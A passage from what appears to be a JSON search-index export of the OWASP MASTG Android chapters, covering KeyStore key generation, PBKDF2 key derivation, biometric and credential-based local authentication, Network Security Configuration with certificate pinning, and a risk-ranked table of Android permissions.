"},{"location":"MASTG/Android/0x05e-Testing-Cryptography/#key-generation","title":"Key Generation","text":"The Android SDK allows you to specify how a key should be generated, and under which circumstances it can be used. Android 6.0 (API level 23) introduced the KeyGenParameterSpec
class that can be used to ensure the correct key usage in the application. For example:
String keyAlias = \"MySecretKey\";\n\nKeyGenParameterSpec keyGenParameterSpec = new KeyGenParameterSpec.Builder(keyAlias,\n KeyProperties.PURPOSE_ENCRYPT | KeyProperties.PURPOSE_DECRYPT)\n .setBlockModes(KeyProperties.BLOCK_MODE_CBC)\n .setEncryptionPaddings(KeyProperties.ENCRYPTION_PADDING_PKCS7)\n .setRandomizedEncryptionRequired(true)\n .build();\n\nKeyGenerator keyGenerator = KeyGenerator.getInstance(KeyProperties.KEY_ALGORITHM_AES,\n \"AndroidKeyStore\");\nkeyGenerator.init(keyGenParameterSpec);\n\nSecretKey secretKey = keyGenerator.generateKey();\n
The KeyGenParameterSpec
indicates that the key can be used for encryption and decryption, but not for other purposes, such as signing or verifying. It further specifies the block mode (CBC), padding (PKCS #7), and explicitly specifies that randomized encryption is required (this is the default). Next, we enter AndroidKeyStore
as the name of the provider in the KeyGenerator.getInstance
call to ensure that the keys are stored in the Android KeyStore.
GCM is another AES block mode that provides additional security benefits over other, older modes. In addition to being cryptographically more secure, it also provides authentication. When using CBC (and other modes), authentication would need to be performed separately, using HMACs (see the \"Tampering and Reverse Engineering on Android\" chapter). Note that GCM is the only mode of AES that does not support padding.
Attempting to use the generated key in violation of the above spec would result in a security exception.
Here's an example of using that key to encrypt:
String AES_MODE = KeyProperties.KEY_ALGORITHM_AES\n + \"/\" + KeyProperties.BLOCK_MODE_CBC\n + \"/\" + KeyProperties.ENCRYPTION_PADDING_PKCS7;\nKeyStore AndroidKeyStore = AndroidKeyStore.getInstance(\"AndroidKeyStore\");\n\n// byte[] input\nKey key = AndroidKeyStore.getKey(keyAlias, null);\n\nCipher cipher = Cipher.getInstance(AES_MODE);\ncipher.init(Cipher.ENCRYPT_MODE, key);\n\nbyte[] encryptedBytes = cipher.doFinal(input);\nbyte[] iv = cipher.getIV();\n// save both the IV and the encryptedBytes\n
Both the IV (initialization vector) and the encrypted bytes need to be stored; otherwise decryption is not possible.
Here's how that cipher text would be decrypted. The input
is the encrypted byte array and iv
is the initialization vector from the encryption step:
// byte[] input\n// byte[] iv\nKey key = AndroidKeyStore.getKey(AES_KEY_ALIAS, null);\n\nCipher cipher = Cipher.getInstance(AES_MODE);\nIvParameterSpec params = new IvParameterSpec(iv);\ncipher.init(Cipher.DECRYPT_MODE, key, params);\n\nbyte[] result = cipher.doFinal(input);\n
Since the IV is randomly generated each time, it should be saved along with the cipher text (encryptedBytes
) in order to decrypt it later.
Prior to Android 6.0 (API level 23), AES key generation was not supported. As a result, many implementations chose to use RSA and generated a public-private key pair for asymmetric encryption using KeyPairGeneratorSpec
or used SecureRandom
to generate AES keys.
Here's an example of KeyPairGenerator
and KeyPairGeneratorSpec
used to create the RSA key pair:
Date startDate = Calendar.getInstance().getTime();\nCalendar endCalendar = Calendar.getInstance();\nendCalendar.add(Calendar.YEAR, 1);\nDate endDate = endCalendar.getTime();\nKeyPairGeneratorSpec keyPairGeneratorSpec = new KeyPairGeneratorSpec.Builder(context)\n .setAlias(RSA_KEY_ALIAS)\n .setKeySize(4096)\n .setSubject(new X500Principal(\"CN=\" + RSA_KEY_ALIAS))\n .setSerialNumber(BigInteger.ONE)\n .setStartDate(startDate)\n .setEndDate(endDate)\n .build();\n\nKeyPairGenerator keyPairGenerator = KeyPairGenerator.getInstance(\"RSA\",\n \"AndroidKeyStore\");\nkeyPairGenerator.initialize(keyPairGeneratorSpec);\n\nKeyPair keyPair = keyPairGenerator.generateKeyPair();\n
This sample creates the RSA key pair with a key size of 4096-bit (i.e. modulus size). Elliptic Curve (EC) keys can also be generated in a similar way. However as of Android 11 (API level 30), AndroidKeyStore does not support encryption or decryption with EC keys. They can only be used for signatures.
A symmetric encryption key can be generated from the passphrase by using the Password Based Key Derivation Function version 2 (PBKDF2). This cryptographic protocol is designed to generate cryptographic keys, which can be used for cryptography purpose. Input parameters for the algorithm are adjusted according to weak key generation function section. The code listing below illustrates how to generate a strong encryption key based on a password.
public static SecretKey generateStrongAESKey(char[] password, int keyLength)\n{\n //Initialize objects and variables for later use\n int iterationCount = 10000;\n int saltLength = keyLength / 8;\n SecureRandom random = new SecureRandom();\n //Generate the salt\n byte[] salt = new byte[saltLength];\n random.nextBytes(salt);\n KeySpec keySpec = new PBEKeySpec(password.toCharArray(), salt, iterationCount, keyLength);\n SecretKeyFactory keyFactory = SecretKeyFactory.getInstance(\"PBKDF2WithHmacSHA1\");\n byte[] keyBytes = keyFactory.generateSecret(keySpec).getEncoded();\n return new SecretKeySpec(keyBytes, \"AES\");\n}\n
The above method requires a character array containing the password and the needed key length in bits, for instance a 128 or 256-bit AES key. We define an iteration count of 10,000 rounds which will be used by the PBKDF2 algorithm. Increasing the number of iterations significantly increases the workload for a brute-force attack on the password, however it can affect performance as more computational power is required for key derivation. We define the salt size equal to the key length divided by 8 in order to convert from bits to bytes and we use the SecureRandom
class to randomly generate a salt. The salt needs to be kept constant to ensure the same encryption key is generated time after time for the same supplied password. Note that you can store the salt privately in SharedPreferences
. It is recommended to exclude the salt from the Android backup mechanism to prevent synchronization in case of higher risk data.
Note that if you take a rooted device or a patched (e.g. repackaged) application into account as a threat to the data, it might be better to encrypt the salt with a key that is placed in the AndroidKeystore
. The Password-Based Encryption (PBE) key is generated using the recommended PBKDF2WithHmacSHA1
algorithm, until Android 8.0 (API level 26). For higher API levels, it is best to use PBKDF2withHmacSHA256
, which will end up with a longer hash value.
Note: there is a widespread false believe that the NDK should be used to hide cryptographic operations and hardcoded keys. However, using this mechanism is not effective. Attackers can still use tools to find the mechanism used and make dumps of the key in memory. Next, the control flow can be analyzed with e.g. radare2 and the keys extracted with the help of Frida or the combination of both: r2frida (see sections \"Disassembling Native Code\", \"Memory Dump\" and \"In-Memory Search\" in the chapter \"Tampering and Reverse Engineering on Android\" for more details). From Android 7.0 (API level 24) onward, it is not allowed to use private APIs, instead: public APIs need to be called, which further impacts the effectiveness of hiding it away as described in the Android Developers Blog
"},{"location":"MASTG/Android/0x05e-Testing-Cryptography/#random-number-generation","title":"Random number generation","text":"Cryptography requires secure pseudo random number generation (PRNG). Standard Java classes as java.util.Random
do not provide sufficient randomness and in fact may make it possible for an attacker to guess the next value that will be generated, and use this guess to impersonate another user or access sensitive information.
In general, SecureRandom
should be used. However, if the Android versions below Android 4.4 (API level 19) are supported, additional care needs to be taken in order to work around the bug in Android 4.1-4.3 (API level 16-18) versions that failed to properly initialize the PRNG.
Most developers should instantiate SecureRandom
via the default constructor without any arguments. Other constructors are for more advanced uses and, if used incorrectly, can lead to decreased randomness and security. The PRNG provider backing SecureRandom
uses the SHA1PRNG
from AndroidOpenSSL
(Conscrypt) provider.
During local authentication, an app authenticates the user against credentials stored locally on the device. In other words, the user \"unlocks\" the app or some inner layer of functionality by providing a valid PIN, password or biometric characteristics such as face or fingerprint, which is verified by referencing local data. Generally, this is done so that users can more conveniently resume an existing session with a remote service or as a means of step-up authentication to protect some critical function.
As stated before in chapter \"Mobile App Authentication Architectures\": The tester should be aware that local authentication should always be enforced at a remote endpoint or based on a cryptographic primitive. Attackers can easily bypass local authentication if no data returns from the authentication process.
On Android, there are two mechanisms supported by the Android Runtime for local authentication: the Confirm Credential flow and the Biometric Authentication flow.
"},{"location":"MASTG/Android/0x05f-Testing-Local-Authentication/#confirm-credential-flow","title":"Confirm Credential Flow","text":"The confirm credential flow is available since Android 6.0 and is used to ensure that users do not have to enter app-specific passwords together with the lock screen protection. Instead: if a user has logged in to the device recently, then confirm-credentials can be used to unlock cryptographic materials from the AndroidKeystore
. That is, if the user unlocked the device within the set time limits (setUserAuthenticationValidityDurationSeconds
), otherwise the device needs to be unlocked again.
Note that the security of Confirm Credentials is only as strong as the protection set at the lock screen. This often means that simple predictive lock-screen patterns are used and therefore we do not recommend any apps which require L2 of security controls to use Confirm Credentials.
"},{"location":"MASTG/Android/0x05f-Testing-Local-Authentication/#biometric-authentication-flow","title":"Biometric Authentication Flow","text":"Biometric authentication is a convenient mechanism for authentication, but also introduces an additional attack surface when using it. The Android developer documentation gives an interesting overview and indicators for measuring biometric unlock security.
The Android platform offers three different classes for biometric authentication:
BiometricManager
BiometricPrompt
FingerprintManager
(deprecated in Android 9 (API level 28))The class BiometricManager
can be used to verify if biometric hardware is available on the device and if it's configured by the user. If that's the case, the class BiometricPrompt
can be used to show a system-provided biometric dialog.
The BiometricPrompt
class is a significant improvement, as it provides a consistent UI for biometric authentication on Android and also supports more sensors than just fingerprint.
This is different to the FingerprintManager
class which only supports fingerprint sensors and provides no UI, forcing developers to build their own fingerprint UI.
A very detailed overview and explanation of the Biometric API on Android was published on the Android Developer Blog.
"},{"location":"MASTG/Android/0x05f-Testing-Local-Authentication/#fingerprintmanager-deprecated-in-android-9-api-level-28","title":"FingerprintManager (deprecated in Android 9 (API level 28))","text":"Android 6.0 (API level 23) introduced public APIs for authenticating users via fingerprint, but is deprecated in Android 9 (API level 28). Access to the fingerprint hardware is provided through the FingerprintManager
class. An app can request fingerprint authentication by instantiating a FingerprintManager
object and calling its authenticate
method. The caller registers callback methods to handle possible outcomes of the authentication process (i.e. success, failure, or error). Note that this method doesn't constitute strong proof that fingerprint authentication has actually been performed - for example, the authentication step could be patched out by an attacker, or the \"success\" callback could be overloaded using dynamic instrumentation.
You can achieve better security by using the fingerprint API in conjunction with the Android KeyGenerator
class. With this approach, a symmetric key is stored in the Android KeyStore and unlocked with the user's fingerprint. For example, to enable user access to a remote service, an AES key is created which encrypts the authentication token. By calling setUserAuthenticationRequired(true)
when creating the key, it is ensured that the user must re-authenticate to retrieve it. The encrypted authentication token can then be saved directly on the device (e.g. via Shared Preferences). This design is a relatively safe way to ensure the user actually entered an authorized fingerprint.
An even more secure option is using asymmetric cryptography. Here, the mobile app creates an asymmetric key pair in the KeyStore and enrolls the public key on the server backend. Later transactions are then signed with the private key and verified by the server using the public key.
"},{"location":"MASTG/Android/0x05f-Testing-Local-Authentication/#biometric-library","title":"Biometric Library","text":"Android provides a library called Biometric which offers a compatibility version of the BiometricPrompt
and BiometricManager
APIs, as implemented in Android 10, with full feature support back to Android 6.0 (API 23).
You can find a reference implementation and instructions on how to show a biometric authentication dialog in the Android developer documentation.
There are two authenticate
methods available in the BiometricPrompt
class. One of them expects a CryptoObject
, which adds an additional layer of security for the biometric authentication.
The authentication flow would be as follows when using CryptoObject:
setUserAuthenticationRequired
and setInvalidatedByBiometricEnrollment
set to true. Additionally, setUserAuthenticationValidityDurationSeconds
should be set to -1.authenticate
method and the CryptoObject
.If CryptoObject
is not used as part of the authenticate method, it can be bypassed by using Frida. See the \"Dynamic Instrumentation\" section for more details.
Developers can use several validation classes offered by Android to test the implementation of biometric authentication in their app.
"},{"location":"MASTG/Android/0x05f-Testing-Local-Authentication/#fingerprintmanager","title":"FingerprintManager","text":"This section describes how to implement biometric authentication by using the FingerprintManager
class. Please keep in mind that this class is deprecated and the Biometric library should be used instead as a best practice. This section is just for reference, in case you come across such an implementation and need to analyze it.
Begin by searching for FingerprintManager.authenticate
calls. The first parameter passed to this method should be a CryptoObject
instance which is a wrapper class for crypto objects supported by FingerprintManager. Should the parameter be set to null
, this means the fingerprint authorization is purely event-bound, likely creating a security issue.
The creation of the key used to initialize the cipher wrapper can be traced back to the CryptoObject
. Verify the key was both created using the KeyGenerator
class in addition to setUserAuthenticationRequired(true)
being called during creation of the KeyGenParameterSpec
object (see code samples below).
Make sure to verify the authentication logic. For the authentication to be successful, the remote endpoint must require the client to present the secret retrieved from the KeyStore, a value derived from the secret, or a value signed with the client private key (see above).
Safely implementing fingerprint authentication requires following a few simple principles, starting by first checking if that type of authentication is even available. On the most basic front, the device must run Android 6.0 or higher (API 23+). Four other prerequisites must also be verified:
The permission must be requested in the Android Manifest:
<uses-permission\n android:name=\"android.permission.USE_FINGERPRINT\" />\n
Fingerprint hardware must be available:
FingerprintManager fingerprintManager = (FingerprintManager)\n context.getSystemService(Context.FINGERPRINT_SERVICE);\nfingerprintManager.isHardwareDetected();\n
The user must have a protected lock screen:
KeyguardManager keyguardManager = (KeyguardManager) context.getSystemService(Context.KEYGUARD_SERVICE);\nkeyguardManager.isKeyguardSecure(); //note if this is not the case: ask the user to setup a protected lock screen\n
At least one finger should be registered:
fingerprintManager.hasEnrolledFingerprints();\n
The application should have permission to ask for a user fingerprint:
context.checkSelfPermission(Manifest.permission.USE_FINGERPRINT) == PermissionResult.PERMISSION_GRANTED;\n
If any of the above checks fail, the option for fingerprint authentication should not be offered.
It is important to remember that not every Android device offers hardware-backed key storage. The KeyInfo
class can be used to find out whether the key resides inside secure hardware such as a Trusted Execution Environment (TEE) or Secure Element (SE).
SecretKeyFactory factory = SecretKeyFactory.getInstance(getEncryptionKey().getAlgorithm(), ANDROID_KEYSTORE);\nKeyInfo secetkeyInfo = (KeyInfo) factory.getKeySpec(yourencryptionkeyhere, KeyInfo.class);\nsecetkeyInfo.isInsideSecureHardware()\n
On certain systems, it is possible to enforce the policy for biometric authentication through hardware as well. This is checked by:
keyInfo.isUserAuthenticationRequirementEnforcedBySecureHardware();\n
The following describes how to do fingerprint authentication using a symmetric key pair.
Fingerprint authentication may be implemented by creating a new AES key using the KeyGenerator
class by adding setUserAuthenticationRequired(true)
in KeyGenParameterSpec.Builder
.
generator = KeyGenerator.getInstance(KeyProperties.KEY_ALGORITHM_AES, KEYSTORE);\n\ngenerator.init(new KeyGenParameterSpec.Builder (KEY_ALIAS,\n KeyProperties.PURPOSE_ENCRYPT | KeyProperties.PURPOSE_DECRYPT)\n .setBlockModes(KeyProperties.BLOCK_MODE_CBC)\n .setEncryptionPaddings(KeyProperties.ENCRYPTION_PADDING_PKCS7)\n .setUserAuthenticationRequired(true)\n .build()\n);\n\ngenerator.generateKey();\n
To perform encryption or decryption with the protected key, create a Cipher
object and initialize it with the key alias.
SecretKey keyspec = (SecretKey)keyStore.getKey(KEY_ALIAS, null);\n\nif (mode == Cipher.ENCRYPT_MODE) {\n cipher.init(mode, keyspec);\n
Keep in mind, a new key cannot be used immediately - it has to be authenticated through the FingerprintManager
first. This involves wrapping the Cipher
object into FingerprintManager.CryptoObject
which is passed to FingerprintManager.authenticate
before it will be recognized.
cryptoObject = new FingerprintManager.CryptoObject(cipher);\nfingerprintManager.authenticate(cryptoObject, new CancellationSignal(), 0, this, null);\n
The callback method onAuthenticationSucceeded(FingerprintManager.AuthenticationResult result)
is called when the authentication succeeds. The authenticated CryptoObject
can then be retrieved from the result.
public void authenticationSucceeded(FingerprintManager.AuthenticationResult result) {\n cipher = result.getCryptoObject().getCipher();\n\n //(... do something with the authenticated cipher object ...)\n}\n
The following describes how to do fingerprint authentication using an asymmetric key pair.
To implement fingerprint authentication using asymmetric cryptography, first create a signing key using the KeyPairGenerator
class, and enroll the public key with the server. You can then authenticate pieces of data by signing them on the client and verifying the signature on the server. A detailed example for authenticating to remote servers using the fingerprint API can be found in the Android Developers Blog.
A key pair is generated as follows:
KeyPairGenerator.getInstance(KeyProperties.KEY_ALGORITHM_EC, \"AndroidKeyStore\");\nkeyPairGenerator.initialize(\n new KeyGenParameterSpec.Builder(MY_KEY,\n KeyProperties.PURPOSE_SIGN)\n .setDigests(KeyProperties.DIGEST_SHA256)\n .setAlgorithmParameterSpec(new ECGenParameterSpec(\"secp256r1\"))\n .setUserAuthenticationRequired(true)\n .build());\nkeyPairGenerator.generateKeyPair();\n
To use the key for signing, you need to instantiate a CryptoObject and authenticate it through FingerprintManager
.
Signature.getInstance(\"SHA256withECDSA\");\nKeyStore keyStore = KeyStore.getInstance(\"AndroidKeyStore\");\nkeyStore.load(null);\nPrivateKey key = (PrivateKey) keyStore.getKey(MY_KEY, null);\nsignature.initSign(key);\nCryptoObject cryptoObject = new FingerprintManager.CryptoObject(signature);\n\nCancellationSignal cancellationSignal = new CancellationSignal();\nFingerprintManager fingerprintManager =\n context.getSystemService(FingerprintManager.class);\nfingerprintManager.authenticate(cryptoObject, cancellationSignal, 0, this, null);\n
You can now sign the contents of a byte array inputBytes
as follows.
Signature signature = cryptoObject.getSignature();\nsignature.update(inputBytes);\nbyte[] signed = signature.sign();\n
Android 7.0 (API level 24) adds the setInvalidatedByBiometricEnrollment(boolean invalidateKey)
method to KeyGenParameterSpec.Builder
. When invalidateKey
value is set to true
(the default), keys that are valid for fingerprint authentication are irreversibly invalidated when a new fingerprint is enrolled. This prevents an attacker from retrieving the key even if they are able to enroll an additional fingerprint.
Android 8.0 (API level 26) adds two additional error codes:
FINGERPRINT_ERROR_LOCKOUT_PERMANENT
: The user has tried too many times to unlock their device using the fingerprint reader.FINGERPRINT_ERROR_VENDOR
: A vendor-specific fingerprint reader error occurred.Ensure that the lock screen is set:
KeyguardManager mKeyguardManager = (KeyguardManager) getSystemService(Context.KEYGUARD_SERVICE);\nif (!mKeyguardManager.isKeyguardSecure()) {\n // Show a message that the user hasn't set up a lock screen.\n}\n
Create the key protected by the lock screen. In order to use this key, the user needs to have unlocked the device in the last X seconds, or the device needs to be unlocked again. Make sure that this timeout is not too long, as it becomes harder to ensure that it was the same user using the app as the user unlocking the device:
try {\n KeyStore keyStore = KeyStore.getInstance(\"AndroidKeyStore\");\n keyStore.load(null);\n KeyGenerator keyGenerator = KeyGenerator.getInstance(\n KeyProperties.KEY_ALGORITHM_AES, \"AndroidKeyStore\");\n\n // Set the alias of the entry in Android KeyStore where the key will appear\n // and the constrains (purposes) in the constructor of the Builder\n keyGenerator.init(new KeyGenParameterSpec.Builder(KEY_NAME,\n KeyProperties.PURPOSE_ENCRYPT | KeyProperties.PURPOSE_DECRYPT)\n .setBlockModes(KeyProperties.BLOCK_MODE_CBC)\n .setUserAuthenticationRequired(true)\n // Require that the user has unlocked in the last 30 seconds\n .setUserAuthenticationValidityDurationSeconds(30)\n .setEncryptionPaddings(KeyProperties.ENCRYPTION_PADDING_PKCS7)\n .build());\n keyGenerator.generateKey();\n} catch (NoSuchAlgorithmException | NoSuchProviderException\n | InvalidAlgorithmParameterException | KeyStoreException\n | CertificateException | IOException e) {\n throw new RuntimeException(\"Failed to create a symmetric key\", e);\n}\n
Set up the lock screen to confirm:
private static final int REQUEST_CODE_CONFIRM_DEVICE_CREDENTIALS = 1; //used as a number to verify whether this is where the activity results from\nIntent intent = mKeyguardManager.createConfirmDeviceCredentialIntent(null, null);\nif (intent != null) {\n startActivityForResult(intent, REQUEST_CODE_CONFIRM_DEVICE_CREDENTIALS);\n}\n
Use the key after lock screen:
@Override\nprotected void onActivityResult(int requestCode, int resultCode, Intent data) {\n if (requestCode == REQUEST_CODE_CONFIRM_DEVICE_CREDENTIALS) {\n // Challenge completed, proceed with using cipher\n if (resultCode == RESULT_OK) {\n //use the key for the actual authentication flow\n } else {\n // The user canceled or didn\u2019t complete the lock screen\n // operation. Go to error/cancellation flow.\n }\n }\n}\n
Make sure that fingerprint authentication and/or other types of biometric authentication are exclusively based on the Android SDK and its APIs. If this is not the case, ensure that the alternative SDK has been properly vetted for any weaknesses. Make sure that the SDK is backed by the TEE/SE which unlocks a (cryptographic) secret based on the biometric authentication. This secret should not be unlocked by anything other than a valid biometric entry. That way, it should never be the case that the fingerprint logic can be bypassed.
"},{"location":"MASTG/Android/0x05g-Testing-Network-Communication/","title":"Android Network Communication","text":""},{"location":"MASTG/Android/0x05g-Testing-Network-Communication/#overview","title":"Overview","text":"Almost every Android app acts as a client to one or more remote services. As this network communication usually takes place over untrusted networks such as public Wi-Fi, classical network-based attacks become a potential issue.
Most modern mobile apps use variants of HTTP-based web services, as these protocols are well-documented and supported.
"},{"location":"MASTG/Android/0x05g-Testing-Network-Communication/#android-network-security-configuration","title":"Android Network Security Configuration","text":"Starting on Android 7.0 (API level 24), Android apps can customize their network security settings using the so-called Network Security Configuration feature which offers the following key capabilities:
If an app defines a custom Network Security Configuration, you can obtain its location by searching for android:networkSecurityConfig
in the AndroidManifest.xml file.
<application android:networkSecurityConfig=\"@xml/network_security_config\"\n
In this case the file is located at @xml
(equivalent to /res/xml) and has the name \"network_security_config\" (which might vary). You should be able to find it as \"res/xml/network_security_config.xml\". If a configuration exists, the following event should be visible in the system logs:
D/NetworkSecurityConfig: Using Network Security Config from resource network_security_config\n
The Network Security Configuration is XML-based and can be used to configure app-wide and domain-specific settings:
base-config
applies to all connections that the app attempts to make.domain-config
overrides base-config
for specific domains (it can contain multiple domain
entries).For example, the following configuration uses the base-config
to prevent cleartext traffic for all domains. But it overrides that rule using a domain-config
, explicitly allowing cleartext traffic for localhost
.
<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<network-security-config>\n <base-config cleartextTrafficPermitted=\"false\" />\n <domain-config cleartextTrafficPermitted=\"true\">\n <domain>localhost</domain>\n </domain-config>\n</network-security-config>\n
Learn more:
The default configuration for apps targeting Android 9 (API level 28) and higher is as follows:
<base-config cleartextTrafficPermitted=\"false\">\n <trust-anchors>\n <certificates src=\"system\" />\n </trust-anchors>\n</base-config>\n
The default configuration for apps targeting Android 7.0 (API level 24) to Android 8.1 (API level 27) is as follows:
<base-config cleartextTrafficPermitted=\"true\">\n <trust-anchors>\n <certificates src=\"system\" />\n </trust-anchors>\n</base-config>\n
The default configuration for apps targeting Android 6.0 (API level 23) and lower is as follows:
<base-config cleartextTrafficPermitted=\"true\">\n <trust-anchors>\n <certificates src=\"system\" />\n <certificates src=\"user\" />\n </trust-anchors>\n</base-config>\n
"},{"location":"MASTG/Android/0x05g-Testing-Network-Communication/#certificate-pinning","title":"Certificate Pinning","text":"The Network Security Configuration can also be used to pin declarative certificates to specific domains. This is done by providing a <pin-set>
in the Network Security Configuration, which is a set of digests (hashes) of the public key (SubjectPublicKeyInfo
) of the corresponding X.509 certificate.
When attempting to establish a connection to a remote endpoint, the system will:
If at least one of the pinned digests matches, the certificate chain will be considered valid and the connection will proceed.
<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<network-security-config>\n <domain-config>\n Use certificate pinning for OWASP website access including sub domains\n <domain includeSubdomains=\"true\">owasp.org</domain>\n <pin-set expiration=\"2018/8/10\">\n <!-- Hash of the public key (SubjectPublicKeyInfo of the X.509 certificate) of\n the Intermediate CA of the OWASP website server certificate -->\n <pin digest=\"SHA-256\">YLh1dUR9y6Kja30RrAn7JKnbQG/uEtLMkBgFF2Fuihg=</pin>\n <!-- Hash of the public key (SubjectPublicKeyInfo of the X.509 certificate) of\n the Root CA of the OWASP website server certificate -->\n <pin digest=\"SHA-256\">Vjs8r4z+80wjNcr1YKepWQboSIRi63WsWXhIMN+eWys=</pin>\n </pin-set>\n </domain-config>\n</network-security-config>\n
"},{"location":"MASTG/Android/0x05g-Testing-Network-Communication/#security-provider","title":"Security Provider","text":"Android relies on a security provider to provide SSL/TLS-based connections. The problem with this kind of security provider (one example is OpenSSL), which comes with the device, is that it often has bugs and/or vulnerabilities.
To avoid known vulnerabilities, developers need to make sure that the application will install a proper security provider. Since July 11, 2016, Google has been rejecting Play Store application submissions (both new applications and updates) that use vulnerable versions of OpenSSL.
"},{"location":"MASTG/Android/0x05h-Testing-Platform-Interaction/","title":"Android Platform APIs","text":""},{"location":"MASTG/Android/0x05h-Testing-Platform-Interaction/#overview","title":"Overview","text":""},{"location":"MASTG/Android/0x05h-Testing-Platform-Interaction/#app-permissions","title":"App Permissions","text":"Android assigns a distinct system identity (Linux user ID and group ID) to every installed app. Because each Android app operates in a process sandbox, apps must explicitly request access to resources and data that are outside their sandbox. They request this access by declaring the permissions they need to use system data and features. Depending on how sensitive or critical the data or feature is, the Android system will grant the permission automatically or ask the user to approve the request.
To enhance user privacy and mitigate privacy risks, it is crucial for Android apps to minimize permission requests and only request access to sensitive information when absolutely necessary. The Android developer documentation offers valuable insights and best practices to help apps achieve the same level of functionality without requiring direct access to sensitive resources:
Android permissions can be classified into distinct categories depending on the extent of restricted data access and permitted actions that they grant to an app. This classification includes the so-called \"Protection Level\" as shown on the permissions API reference page and AndroidManifest.xml Source Definitions.
normal
. Grants apps access to isolated application-level features with minimal risk to other apps, the user, and the system. Example: android.permission.INTERNET
signature
. Granted only to apps signed with the same certificate as the one used to sign the declaring app. Example: android.permission.ACCESS_MOCK_LOCATION
systemOrSignature
. Reserved for system-embedded apps or those signed with the same certificate as the one used to sign the declaring app. Example: android.permission.ACCESS_DOWNLOAD_MANAGER
. Old synonym for signature|privileged
. Deprecated in API level 23.dangerous
. Grant additional access to restricted data or let the app perform restricted actions that more substantially affect the system and other apps.appop
. Grant access to system resources that are particularly sensitive such as displaying and drawing over other apps or accessing all storage data.normal
, signature
or dangerous
.Independently from the assigned Protection Level, it is important to consider the risk that a permission might be posing considering the additional guarded capabilities, this is especially important for preloaded apps. The following table presents a representative set of Android permissions categorized by associated risk as defined in this paper which leverages the set of (privileged) permissions and entrance points to an app to estimate its attack surface.
Risk Category Permissions Protection Level ASTRONOMICALandroid.permission.INSTALL_PACKAGES
signature CRITICAL android.permission.COPY_PROTECTED_DATA
signature android.permission.WRITE_SECURE_SETTINGS
signature android.permission.READ_FRAME_BUFFER
signature android.permission.MANAGE_CA_CERTIFICATES
signature android.permission.MANAGE_APP_OPS_MODES
signature android.permission.GRANT_RUNTIME_PERMISSIONS
signature android.permission.DUMP
signature android.permission.CAMERA
dangerous android.permission.SYSTEM_CAMERA
systemOrSignature android.permission.MANAGE_PROFILE_AND_DEVICE_OWNERS
signature android.permission.MOUNT_UNMOUNT_FILESYSTEMS
signature HIGH android.permission.INSTALL_GRANT_RUNTIME_PERMISSIONS
signature android.permission.READ_SMS
dangerous android.permission.WRITE_SMS
normal android.permission.RECEIVE_MMS
dangerous android.permission.SEND_SMS_NO_CONFIRMATION
signature android.permission.RECEIVE_SMS
dangerous android.permission.READ_LOGS
signature android.permission.READ_PRIVILEGED_PHONE_STATE
signature android.permission.LOCATION_HARDWARE
signature android.permission.ACCESS_FINE_LOCATION
dangerous android.permission.ACCESS_BACKGROUND_LOCATION
dangerous android.permission.BIND_ACCESSIBILITY_SERVICE
signature android.permission.ACCESS_WIFI_STATE
normal com.android.voicemail.permission.READ_VOICEMAIL
signature android.permission.RECORD_AUDIO
dangerous android.permission.CAPTURE_AUDIO_OUTPUT
signature android.permission.ACCESS_NOTIFICATIONS
signature android.permission.INTERACT_ACROSS_USERS_FULL
signature android.permission.BLUETOOTH_PRIVILEGED
signature android.permission.GET_PASSWORD
signature android.permission.INTERNAL_SYSTEM_WINDOW
signature MEDIUM android.permission.ACCESS_COARSE_LOCATION
dangerous android.permission.CHANGE_COMPONENT_ENABLED_STATE
signature android.permission.READ_CONTACTS
dangerous android.permission.WRITE_CONTACTS
dangerous android.permission.CONNECTIVITY_INTERNAL
signature android.permission.ACCESS_MEDIA_LOCATION
dangerous android.permission.READ_EXTERNAL_STORAGE
dangerous android.permission.WRITE_EXTERNAL_STORAGE
dangerous android.permission.SYSTEM_ALERT_WINDOW
signature android.permission.READ_CALL_LOG
dangerous android.permission.WRITE_CALL_LOG
dangerous android.permission.INTERACT_ACROSS_USERS
signature android.permission.MANAGE_USERS
signature android.permission.READ_CALENDAR
dangerous android.permission.BLUETOOTH_ADMIN
normal android.permission.BODY_SENSORS
dangerous LOW android.permission.DOWNLOAD_WITHOUT_NOTIFICATION
normal android.permission.PACKAGE_USAGE_STATS
signature android.permission.MASTER_CLEAR
signature android.permission.DELETE_PACKAGES
normal android.permission.GET_PACKAGE_SIZE
normal android.permission.BLUETOOTH
normal android.permission.DEVICE_POWER
signature NONE android.permission.ACCESS_NETWORK_STATE
normal android.permission.RECEIVE_BOOT_COMPLETED
normal android.permission.WAKE_LOCK
normal android.permission.FLASHLIGHT
normal android.permission.VIBRATE
normal android.permission.WRITE_MEDIA_STORAGE
signature android.permission.MODIFY_AUDIO_SETTINGS
normal Note that this categorization can change over time. The paper gives us an example of that:
Prior to Android 10, the READ_PHONE_STATE
permission would be classified as HIGH, due to the permanent device identifiers (e.g. (IMEI/MEID, IMSI, SIM, and build serial) that it guards. However, starting from Android 10, a bulk of the sensitive information that can be used for tracking has been moved, refactored or rescoped into a new permission called READ_PRIVILEGED_PHONE_STATE
, putting the new permission in the HIGH category, but resulting in the READ_PHONE_STATE
permission moving to LOW.
Android 8.0 (API level 26) Changes:
The following changes affect all apps running on Android 8.0 (API level 26), even to those apps targeting lower API levels.
READ_CONTACTS
permission, queries for contact's usage data will return approximations rather than exact values (the auto-complete API is not affected by this change).Apps targeting Android 8.0 (API level 26) or higher are affected by the following:
GET_ACCOUNTS
permission granted, unless the authenticator owns the accounts or the user grants that access.PHONE
permissions group:ANSWER_PHONE_CALLS
permission allows to answer incoming phone calls programmatically (via acceptRingingCall
).READ_PHONE_NUMBERS
permission grants read access to the phone numbers stored in the device.Restrictions when granting dangerous permissions: Dangerous permissions are classified into permission groups (e.g. the STORAGE
group contains READ_EXTERNAL_STORAGE
and WRITE_EXTERNAL_STORAGE
). Before Android 8.0 (API level 26), it was sufficient to request one permission of the group in order to get all permissions of that group also granted at the same time. This has changed starting at Android 8.0 (API level 26): whenever an app requests a permission at runtime, the system will grant exclusively that specific permission. However, note that all subsequent requests for permissions in that permission group will be automatically granted without showing the permissions dialog to the user. See this example from the Android developer documentation:
